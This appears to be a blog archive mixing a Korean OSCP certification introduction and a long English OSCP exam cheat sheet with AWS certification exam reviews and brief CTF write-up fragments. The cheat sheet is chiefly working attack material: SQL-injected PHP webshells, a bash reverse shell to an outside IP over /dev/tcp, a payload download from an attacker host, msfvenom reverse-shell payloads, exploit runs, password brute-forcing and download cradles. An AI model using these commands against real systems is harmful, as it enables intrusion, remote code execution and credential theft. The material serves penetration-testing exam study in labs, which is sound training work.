OSCP 자격증소개

OSCP (Offensive Security Certified Professional)은 Offensive Security 기관에서 제공하는 해킹 자격증이다. *Offensive Security는 미국 국제 정보보안 회사로 ExploitDB 취약점 데이터베이스 및 칼리리눅스(Kali Linux)를 제공하는 기관이다.

기타 정보보안자격증과 다르게 24시간안에 해킹을 해야하는 100% 실습시험인데,

주어진 시간안에 해킹을하고 보고서를 제출하는 자격증이다 보니, 일반 정보보호 자격증보다 가격이 비싸고 합격률도 낮다. 그래도 미국에선 해당 자격증을 따기만하면 기본적인 100k – 120k (1억-1억2천) 연봉은 보장이 되는데. 그정도로 인지도가 높은 자격증 중에 하나이다.

OSCP 자격증

  • 주관기관 : Offensive Security
  • 자격증시험 : 100% 실무
    • 시험 시간 : 24시간 + 24시간(보고서작성) = 총 48시간
    • 시험 내용 : 24시간 안에 주어진 가상머신들의 최고관리자 권한 획득 후, 그다음 24시간안에 모의해킹 레포트를 제출하세요.
    • 시험 준비 기간 : 6 – 9개월 (개인마다 차이가 있음)
  • 공식 사이트 : https://www.offensive-security.com/

Scanning – Web

Web Login Form Brutefocing

HTTP Hydra

hydra -l admin -P /usr/share/wordlist/SecList/Passwords/10k_most_common.txt 192.168.88.162 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 64

PUT method

nmap -sV --script http-put --script-args http-put.url=’/test/meterpreter4444.php’,http-put.file=’/root/Exam0119/pwd/192.168.111.149/meterpreter4444.php’ -p 80 192.168.111.149
nmap –script http-methods –script-args http-methods.url-path=’/uploads’,http-methods.test-all -p 8585 172.28.128.3

Starting Web Service

//Attacker usually uses this to transfer files
python -m SimpleHTTPServer 8080
python3 -m http.server 80"

Nmap Scanning for Web Service(HTTP/HTTPS)

nmap -PN -p 22 --open -oG - 10.11.1.* | awk '$NF~/ssh/{print $2}'
nmap 10.11.1.* -p22,80 --open -oG - | awk '/22\/open.*80\/open/{print $2}'
nmap 10.11.1.* -p80,8080 --open -oG - | awk '/80\/open.*8080\/open/{print $2}'
nmap -p 80,8080 10.11.1.1-255

– Uniscan Scanning

uniscan.pl -u target -qweds

– HTTP Enumeration 

httprint -h http://www.example.com -s signatures.txt

– Directory Traversal 

To navigate and find any sub directories.
Dirbuster Wordlist : /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

dirb http://10.11.1.202 /usr/share/dirb/wordlists/vulns/iis.txt
gobuster -u http://10.11.1.133/ -w /usr/share/wordlists/dirb/common.txt -q -n -e
dirb http://10.11.1.133/index/sips/ /usr/share/dirb/wordlists/
./dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $targetip -e php"
//cf. https://github.com/maurosoria/dirsearch

//removing status code for 200,204,301,307,403; 
gobuster -s 200,204,301,307,403 -u http://192.168.88.168 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

– Nikto 

nikto -h 192.168.88.132
nikto -h http(s)://[IP]:[PORT]/[DIRECTORY] 
nikto -C all -h http://10.11.1.72"

LFI(Local File Inclusion)

lfisuite.py
eg.

browse.php?file=php://filter/convert.base64-encode/resource=ini.php
browse.php?file=php://filter/convert.base64-encode/resource=browse.php
echo -n encodedstrings | base64 -d
browse.php?file=/etc/passwd
index.php?file=

If target has phpinfo.php, check out “file_uploads”, see if appears as enabled(ON); if so, the target is vuln for LFI.

Uploading malicious .php file on database 

ref : http://hackingandsecurity.blogspot.com/2017/08/proj-12-exploiting-php-vulnerabilities.html
SQL-phpshellscript : create below malicious (shell).php script on DB

Windows : SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\shell.php"
Linux : SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/shell.php"

After uploading above maclious php webshell, browse to the page with command, eg. http://192.168.1.101/DBlocation/shell.php?cmd=ipconfig

RFI(Remote File Inclusion) 

eg.

browse.php?file=http://10.11.0.42/index.html
browse.php?file=ftp://10.11.0.42/index.html
browse.php?expect://ls

Gain a shell via phpinfo.php ref: https://office.tuxcon.com/root/web-sec-payloads/src/commit/fd99da6c06e00a596becdcfc6d2efe50bad0f47c/File Inclusion – Path Traversal

Squid 

proxy scanner/http/squid_pivot_scanning
RHOST : Target
RANGE : Target
RPORT : Squid port

msf auxiliary(scanner/http/squid_pivot_scanning) > run
[+] [192.168.88.155] 192.168.88.155 is alive but 21 is CLOSED
[+] [192.168.88.155] 192.168.88.155:80 seems OPEN
if the target uses squid proxy via 3128 port, use nikto with that proxy setting 
nikto -h 192.168.88.155 -useproxy http://192.168.88.155:3128"

ShellShock 

nikto scan results; shows shellshock on /cgi-bin; use 34900.py

root@kali:~/Exam/Sicos1# python 34900.py payload=reverse rhost=192.168.88.155 lhost=192.168.88.157 lport=1234
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/status"

MySQL 

nmap -sV -Pn -vv –script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.0.0.1 -p 3306

MySQL login : sh mysql -h 192.168.88.152 -D wordpress -u root -p plbkac
MySQL Spawning Reverse shell(linux) : union select ""<?php exec(\""/bin/bash -c \'bash -i >& /dev/tcp/159.203.242.172/1999 0>&1\'\"");"" INTO OUTFILE '/var/www/ecustomers/samshell4.php'

UPLOAD A FILE :

' union select ""<?php file_put_contents(\""root\"", file_get_contents(\""http://attack.samsclass.info/root\"")); ?>"" INTO OUTFILE '/var/www/ecustomers/samget2.php' #

OPEN A PHP SHELL :

' union select ""<?php system($_REQUEST['cmd']); ?>"" INTO OUTFILE '/var/www/ecustomers/samshell.php' #

Windows IIS 

Getting Windows 0S and version details through Nikto / Nmap Scanning.

auxiliary/admin/http/iis_auth_bypass

Tomcat 

Default cred for Tomcat;“tomcat/tomcat” and check out /manager console by navigating to browsereg. http://10.11.1.209:8080/manager/html
You can upload reverse shell on manager consor ; msfvenom jsp or war file

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.37 LPORT=443 -f war > shell.war
jar -xvf shell.war

Config files 

PHP + DB cred files

/etc/mysql/my.cnf 
/var/www/html/config.php

WordPress 

wpscan --url http://10.11.1.71/ -enumerate p
wpscan --url 10.0.2.4 --enumerate vp
wpscan --url https://192.168.88.152:12380/blogblog -enumerate u --disable-tls-checks
wpscan --url http://192.168.88.179/wordpress/ --wordlist /usr/share/wordlists/rockyou.txt
wpscan --url https://192.168.88.152:12380/blogblog/ --enumerate ap --disable-tls-checks
wpscan --url www.local.test --enumerate u --threads 50

ref : finding username & password(autoscript) : https://github.com/claudioviviani/bash-wordpress-xml-bruteforce

PHPAdmin 

http://.../phpmyadmin
db and password located @ /etc/phpmyadmin/config-db.php and default cred can be; (root/blank)(pma/blank)
You can also bruteforce by sh hydra 10.10.10.43 -l admin -P /usr/share/dict/rockyou.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!"

Webdav

WebDav Vulnerability Check : nmap -T4 -p80 --script=http-iis-webdav-vuln 10.11.1.229
auxiliary : webdav_test

cadaver http://10.11.x.x/webdav/

Uploading shells.txt to `shells.txt’

dav:> put shells.txt
dav:> copy shells.txt shells.asp;.txt

ColdFusion (Vulnerable)

Version check : http://example.com/CFIDE/adminapi/base.cfc?wsdl
LFI(passowrd file) : http://server/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/ColdFusion8/lib/password.propertiesen
(either – neo-security.xml and password.properties)
ref : https://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/

exploit/windows/http/coldfusion_fckeditor – only for 8.0.1

XAMPP

XAMPP cred(wampp/xampp)

RealVNC

RealVNC : https://www.exploit-db.com/exploits/36932
Edit, BIND_ADDR into mine and BIND_PORT into 4444
root@kali:~/PWK-Lab/10.11.1.227$python RealVNC-exploit-36932.py
[] Please input an IP address to pwn: 10.11.1.227
[
] Hello From Server: RFB 003.008
Ctrl+Alt+Shift+Del will be vmware’s ctrl+alt+del

SquirrelMail

https://raw.githubusercontent.com/xl7dev/Exploit/master/SquirrelMail/SquirrelMail_RCE_exploit.sh

AT-TFTP

1.9 version : ref: https://github.com/brianwrf/cve-2006-6184

perl -e 'print ""\x81\xec\xac\x0d\x00\x00""' > stackadj
msfvenom -p windows/shell/reverse_nonx_tcp LHOST=10.11.0.37 LPORT=443 R > payload
cat stackadj payload > shellcode
cat shellcode | msfvenom -e x86/shikata_ga_nai -b ""\x00"" -a x86 --platform win -f python

MISC

Drupal cred(admin/admin)
Elastix “cred(admin/admin) http://example.com/vtigercrm/
You might be able to upload shell in profile-photo.

Post-Exploit: Transferring Files

File Transfer

Below methos can be used to transfer files…

Transferring Files to Windows

Running Webserver on Kali

python -m SimpleHTTPServer 8080 

Transfer with Netcat

//Kali
nc -lvp 1234 > zeroday.txt
//Win 
nc 192.168.0.114 1234 < zero-day.txt

ref: https://blog.ropnop.com/transferring-files-from-kali-to-windows/

TFTP 
If target has tftp running, you can easily check it by typing tftp on windows cmd.
Starting tftp service :

atftpd --daemon --port 69 /tftp 
/etc/init.d/atftpd restart
cd /srv/tftp
cp /var/www/html/nc.exe .

//transfer nc.exe  
tftp -i 10.11.0.42 GET nc.exe
//PUT
tftp -i 10.11.0.42 PUT test.txt

FTP 
Setup FTP service by downloading pyftp library

apt-get install python-pyftpdlib  
python -m pyftpdlib -p 21 -w

Transfer with FTP commands

You can also automate ftp process by creating ftp.txt

echo open 10.11.0.42>ftp.txt
echo anonymous>>ftp.txt
echo password>>ftp.txt
echo binary>>ftp.txt
echo get nc.exe>>ftp.txt 
echo bye>>ftp.txt
ftp -s:ftp.txt

cf. Setting FTP

groupadd ftpgroup 
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd offsec -u ftpuser -d /ftphome 
pure-pw mkdb 
cd /etc/pure-ftpd/auth/ 
ln -s ../conf/PureDB 60pdb 
mkdir -p /ftphome 
chown -R ftpuser:ftpgroup /ftphome/ 
/etc/init.d/pure-ftpd restart

root@kali:~# chmod 755 setup-ftp 
root@kali:~# ./setup-ftp 
Password: 
Enter it again: 
Restarting ftp server

Creating VBscript 
wget.vbs * VBScript (eg. in Windows XP, 2003)

//wget.vbs

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

Usgage : cscript wget.vbs http://10.11.0.42/wget.exe wget.exe

PowerShell- (in Windows 7, 2008, and above)
wget.ps1

echo $storageDir = $pwd > wget.ps1 
echo $webclient = New-Object System.Net.WebClient >>wget.ps1 
echo $url = "http://10.11.0.42/nc.exe" >>wget.ps1 
echo $file = "nc.exe" >>wget.ps1 
echo $webclient.DownloadFile($url,$file) >>wget.ps1 

Usgage : powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive NoProfile -File wget.ps1

Basic Scanning

Default Nmap Scanning

nmap -sU -sV -n --top-ports 200 192.168.1.30  > /root/PWK-Lab/192.168.1.30/nmap-udp
nmap -sT -sV -A -O -v -p 1-65535 192.168.1.30 > /root/PWK-Lab/192.168.1.30/nmap-tcp

-sS stealth scanning

nmap -vv -Pn -A -sC -sS -T 4 -p- 10.x.x.x
nmap -p- -sS -A 10.x.x.x
  • Vulnerability Scanningnmap -sS -sV --script=vulscan/vulscan.nse 10.x.x.x
  • OS detectionnmap -O -v 10.x.x.x

Automated scanning tools

  • Reconnoitre : python /root/Recon/Reconnoitre/reconnoitre.py -t 10.x.x.x - /root/PWK-Lab/10.x.x.x/ --services
  • OneTwoPunch : vi targets.txt; onetwopunch.sh -t targets.txt -p all -n "-sV -O --version-intensity=9"
  • unicornscan -i tap0 -I -mT 10.x.x.x:a
  • masscan -p0-65535 10.x.x.x –rate 150000 -oL output.txt

Scanning per protocols

– SSH(22)

  • Bruteforce :
nmap -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=users.txt --script-args ssh-brute.timeout=4s 10.x.x.x 
hydra -l user -P /usr/share/wordlists/rockyou.txt  10.x.x.x ssh -t 4

ref : https://github.com/g0tmi1k/debian-ssh && https://blog.g0tmi1k.com/2010/04/pwnos/
OpenF*** (Apache mod_ssl < 2.8.7 OpenSSL) 764.c

– FTP(21)

  • Default cred : anonymous/anonymous | ftp/ftp | ftpuser|ftpuser
nmap -sV -Pn -vv -p 21  --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 10.x.x.x
nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.x.x.x
check windows OS files : https://www.quora.com/How-can-I-tell-what-version-of-Windows-is-installed-on-a-hard-drive-without-booting-it 
  • Bruteforce :
medusa -h 10.x.x.x -u user -P /root/SecLists/Passwords/bt4-password.txt -M ftp 
./root/PWK-Lab/FTP/ftp-user-enum-1.0/ftp-user-enum.pl -U /root/PWK-Lab/fuzzdb/bruteforce/names/simple-users.txt -t 10.x.x.x

– SMTP(25)

  • Vulnerability Check
nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.x.x.x 
  • Enumerating Users
nmap --script smtp-enum-users.nse 10.x.x.x

smtp-user-enum -M VRFY -U users.txt -t 10.x.x.x
smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.x.x.x
smtp-user-enum -M VRFY -U  /usr/share/seclists/Usernames/Names/names.txt -t 10.x.x.x
  • Connecting to Mail Server
telnet IPADDRESS 25
nc -nvv IPADDRESS 25
  • msf module : auxiliary/scanner/smtp/smtp_enum

– POP3(110)

  • Bruteforce : hydra -L usr.txt -P /usr/share/wordlists/fasttrack.txt -t20 10.x.x.x -s55007 -I pop3
  • POP3 command
USER boris
PASS *****
LIST 
RETR 1 

– SNMP(161)

  • Default Community Strings : public/private/manager
snmp-check -t [IP] -c public 
snmpwalk -c public -v1 10.0.0.0 
nmap -sU --open -p 161 10.11.1.0/24 -oG mega-snmp.txt 
sudo nmap -sU -p 161 --script default,snmp-sysdescr 10.11.1.0/24 
onesixtyone -c community -i ips 
nmap 10.11.1.* -p161 --open -oG - | awk '/161\/open/{print $2}' 

– SMB(139,445)

  • Checking SMB port open/running :
nmap -A -p 139,445 10.11.1.1-254 -oG smb_service.txt; grep Up smb_service.txt | cut -d "" "" -f 2  
nmap 10.11.1.* -p139,445 --open -oG - | awk '/139\/open.*445\/open/{print $2}'  
  • Vulnerability scanning 

 nmap -p 139,135,445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.x.x.x

  • Enumerating Users  

nmap --script smb-enum-users.nse -p445 10.x.x.x nmap -sU -sS --script smb-enum-users.nse -p U:137,T:139 10.x.x.x

  • smbclient
smbclient -L //10.x.x.x/share -U user 
smbclient //10.x.x.x//IPC$ -N  
  • checking access
acccheck -v -t 10.x.x.x  -u user -P /usr/share/dirb/wordlists/common.txt  
acccheck -v -t 10.x.x.x -U /root/Vulnhub/Stapler/user.txt  -P /usr/share/dirb/wordlists/common.txt  
  • smbmap
smbmap -u user -p user -d share -H 10.x.x.x  
smbmap -u user -p .bash_history -d share -H 10.x.x.x  
smbmap -H 10.x.x.x\share -u user -p '.bash_history' -L  

ref : https://hackercool.com/2016/07/smb-enumeration-with-kali-linux-enum4linuxacccheck-smbmap/

OSCP 공부법 – 버퍼오버플로우

OSCP 에 합격하기 위해선 BoF 버퍼 오버플로우에 대해 잘 알고있어야한다. 이미 Offensive Security 에서 BoF 에 관련된 자료들을 많이 주지만, 해당 PWK에서 제공하는 Lab과 Course exercise는 시험을 대비하기 충분하지 않다.

그래서 일부러 시험준비를 위해 Exploit-db에 있는 사용가능한 BoF 취약점들을 응용해 공부했다. exploit-db(https://www.exploit-db.com/)에들어가면 여러가지 다양한 취약점과 취약점을 이용한 코드들을 볼수있는데.

Buffer Overflow라 검색을 하고, vulnerable application이 있는지 여부를 필터링해서, 해당 취약 어플리케이션이 있는 경우.  VM 가상머신에 비슷한 환경을 만들어서 코드를 만드는걸 연습해보았다. (예를들어서, SLmailv5.5 버퍼오버플로우 취약점의경우, exploit-db에서 해당 취약프로그램을 다운받아 Windows VM 에 설정한후, 공격칼리로 직접 BoF를 만들어서 공격을 함)

이미 다른사이트에서도 버퍼오버플로우 연습으로 많은 프로그램이 올라와있는데, 나는 아래와같은 취약 프로그램을 이용했다

AWS Certified Security Specialty Study Guide

Overall, it took me about 3 months for studying this exam with full-time 40hrs/week job. I’m pretty sure anyone who has more hands-on experience in AWS environment will take less than 3 months to pass this exam.

studying

Study Material;

 

Study Plan;

I spent first two months listening ACloudGuru course and make my own notes, then watched LinuxAcademy. ACloudGuru course does cover all of exam topics, though you still need to fill more details based on AWS FAQ or whitepapers. I really like the structure of A Cloud Guru‘s, having summary video and practice quiz for individual chapter; where students can refresh their memory and go for further research & study based on quiz’s feedback. Linux Academy course has really useful feature; lab, where you can go into their temporary aws console and practice it. If you prefer to learn hands-on things, I would recommend LinuxAcademy.

 

*TIPS* since we are busy worker or have other things to do in real-life, it’s pretty tough to find extra time for studying. So I print out the courses’ summary/note in small&pocket size and read it during commute or lunch time at work. You can find summary&exam notes in github or quizlet; Brianlam38 github and Antoine_Sylvia quizlet. I also upload the mindmap that created during aCloudGuru course on my github.

summary-note

After finishing online courses for 2 months, I started to practicing with exam simulator. I took ACloudGuru Exam Simulator and got 60 at first… and I realize that I’ve never studied this topic as scenario-based before. *Unlike AWS Practitioner Exam, Security Specialty Exam has a lot of scenario based questions and you get to choose either more reasonable or secure answer(depends on the questions, the answer can be cost-effective choice). So I practice with ACloudGuru & BrainCert and learned AWS security services within the real-life examples because I ended up reading bunch of AWS whitepapers and AWS Security Blogs articles based on feedback I got from each test.

By the time I got 95 score on ACloudGuru Exam Simulator, I decide to book the exam.I also took AWS Certified Security Specialty practice exam online; but this one doesn’t show how much score you got nor which question incorrectly.. So, you can buy a practice game (It was free for me since I got voucher code from previous AWS cert exam), if you want to see the level of difficulty of exam.

practice exam

If you prefer to read additional study material & study plan, I find below blogs&sites are useful;

 

AWS Certified Security Specialty Exam Review – 2020

The AWS Certified Security – Specialty helps you broad understanding about Security principals and architecture of AWS environment and also deep-dive of security tools and service that aws provides.

The exam format is multiple choice, multiple answers; 170 minutes(Practice test is $40)  and costs 300 USD. *TIPs* When you register your exam or practice exam, you can get 50% OFF for exam fee and FREE practice exam if you have vouchers to use from previous AWS cert test. Luckily, I had vouchers to use for both after passing practitioner test. benefits

For more details about exam, please check AWS official website and AWS Certified Security Specialty Exam Guide

I took exam on Feb 17th, 2020 10:00AM, it took me literally entire 160 minutes to finish. I had 10 minutes before time out, and had 5 more survey questions after the exam questions review :o..  The level of exam is tougher than i thought. I’m glad that I pass. I will update more study plan & material I used for study on next posting.

AWS Certified Practitioner Exam Review-2019

AWS Certified Cloud Practitioner; passing exam within one month.

I started studying for AWS Certified Cloud Practitioner on Aug 31st. I finished all 6 chapters from a CloudGuru during weekends. I believe the course itself is 6 hours total.

During video lectures, I wrote down few keynotes & summary, since I tend to get easily distracted with online courses. After memorizing keynotes and summary the notes, I finish practice test on CloudGuru with 86 score. And spent one or two weeks reading the suggested whitepapers from AWS examguide. I only read below 3 white papers just one time each.

  • Overview of Amazon Web Services whitepaper, July 2019
  • Architecting for the Cloud: AWS Best Practices whitepaper, October 2018
  • How AWS Pricing Works whitepaper, June 2018

After then, I purchased AWS Certified Cloud Practitioner practice test on Udemy. I personally feel the level of difficulty is like; so I want to point out the actual exam questions can be difficult than CludGuru Practice Test.

There’s also (free) course from AWS training website for AWS Cloud Practitioner but personally CloudGuru is more informative and user-friendly, in my opinion. So I skip AWS training course and just complete AWS Cloud Practitioner practice test(free).

[ AWS Cloud Guru Practice Test < Exam < Udemy Practice Test ].

While taking Udemy practice test, I notice there are few terminology that I’ve never heard of during CloudGuru course. Probably may have been read it on the AWS whitepapers before.. So I review the Udemy answers and memorize terminologies that appeared frequently during the test.

 

AWS Certified Cloud Practitioner; Online Exam (CBT)

I booked proctoring exam on Sept 28th for 4PM(EST). I book online computer based exam through online. You can check more details about how to book online exam; https://aws.amazon.com/blogs/apn/now-you-can-take-the-aws-certified-cloud-practitioner-exam-at-your-home-or-office-24-7/

I joined the exam interface before 30 minutes and confirmed all the devices working fine. There was some technical issues during the exam, but it didn’t impact me a lot during 90 minutes of exam time.

ctfbook-web

Once executing the program, it shows login page and mailbox image. For some reaonse, it’s not allowing us to modify or click anything.

Image 2

To check out this program, I run nmap scanning for local ip 127.0.0.1 and see which port and protocol is running. I notice 25 port is opened with ESMTP protocol.

nmap

So, i telnet into the mail server and check out the banner(title).

TELNET

So, i pull the spam email via SMTP command, but it seems like the data isn’t pulling or listing. Instead of checking the emails, i try to sending emails.

Image 7

Since the program named,  XSS Bonasai Revolutions, Cross-site-scripting might be related, so I send below email and check out the program.

sendingsending

results

now I can see the vulnerable field is a date, so I put XSS instead of <img src=0>

 

 

ctfbook-network

01

Under DESCRIPTOR RESPONSE for USB Device, I can check the Vendor and product information for USB Device. https://wiki.wireshark.org/USB

I need to find out what types of file it is from URB_INTERUPT IN traffic, by noticing the difference